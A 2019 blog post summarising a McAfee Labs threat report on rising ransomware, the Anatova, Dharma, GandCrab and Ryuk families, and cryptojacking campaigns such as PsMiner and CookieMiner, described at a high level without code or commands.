According to new report released by McAfee Labs, Ransomware attacks have grown by 118% this year. New families have been detected, and threat actors have been using new, innovative techniques to evade AV and other protection softwares & appliances.
The McAfee Labs Advanced Threat Research team were the first to discover a new family of Ransomware, Anatova, which ciphers all files before requesting a ransom payment from its victims. Anatova is unique in that it is modular, which can facilitate future developments in ransomware.
New Ransomware Techniques Uncovered
Included in the 118% increase in ransomware attack are the discovery of new ransomware families that utilize new, innovative methods to target and infiltrate victims. According to the report, McAfee researchers observed threat actors utilizing common spear phishing attacks, but an increasing number of attacks are being deployed via open and exposed RDP and VNC remote access points. In the past, Ransomware relied on C&C environments for the ransomware delivery and decryption keys. However, most actors now approach victims with ransom notes that include an anonymous email service and a specified ransom to be paid in cryptocurrency. Most threat actors know the majority of their victims will be unfamiliar with cryptocurrency, so they generally include basic instructions and locations to obtain cryptocurrency.
Anatova, based on the name of the ransom note, was detected in a private p2p network by the McAfee ATR team before it had a chance to become a bigger threat. Anatova usually uses the icon of a game or app to trick victims into downloading it. Anatova can adapt quickly using evasion tactics and spreading mechanisms. The ransomware has a manifest to request admin rights and protections against static analysis which makes it difficult to be detected. The modular design allows for new, embedded functions designed to thwart anti-ransomware protections.
Top Three Ransomware Families in 2019
While unique ransomware families declined in Q4 of 2018, the first quarter of 2019 saw the exact opposite. Several new families of Ransomware were detected using innovative techniques to target businesses. According to McAfee, the top three ransomware families active in Q1 of 2019 are:
- Dharma: Dharma is a variant of CrySIS that appends various extensions to encrypted files. It has been in operation since 2016, and it’s authors continually update and release new variants, which are not decryptable.
- GandCrab: Utilizing AES encryption, this variant encrypts files with a “.GDCB” extension. Using the RIG exploit kit, GandCrab drops a file labeled “GandCrab.exe” on the infected system and begins encrypting files.
- Ryuk: Ryuk impeded newspaper printing in the United States during early Q1. Not much is known about Ryuk, however McAfee hypothesizes that the Ryuk attacks are not necessarily backed by a nation-state, but rather share the characteristics of a cybercrime operation.
Ryuk and GandCrab tend to rely on spear-phishing attacks, where Dharma is used in RDP/VNC attacks. New variants of another persistent family, Scarab, have also been detected on a continual basis this year.
Cryptojacking Families and Campaigns
Cryptojacking increased by 29% in 2019. New miner families were detected targeting both Windows and Mac users. These miners were also used to steal wallets and credentials.
One of the most prevalent crypto malware campaigns detected in Q1 was the PsMiner. PsMiner is distributed through a Trojan with worm capabilities. It is designed to brute force its way into vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, SqlServer, ThinkPHP, and Weblogic and the spread itself from server to server for more efficient mining. Like many other miners targeting Windows, PsMiner is dropped via a Powershell command that downloads the “WindowsUpdate.ps1” payload.
CookieMiner is another new malware family that targets Apple users. CookieMiner shares code with a past campaign, with an end goal of stealing wallets and credentials. Utilizing Empyre for automation, once deployed, CookieMiner sets about siphoning data from the infected system. It has been observed stealing data from Binance, Bitstamp, Bittrex, Coinbase, MyEtherWallet, and Poloniex. While being a credential scraper, CookieMiner’s choice of coin to mine was unique in that it was Koto coin rather than Monero, which is the most commonly mined coin among malicious cryptominers as it can be CPU mined. CookieMiner was implanted as a library in MacOS and used to send the stolen coins to the xmrig server.
-N. Coursey, August 30th, 2019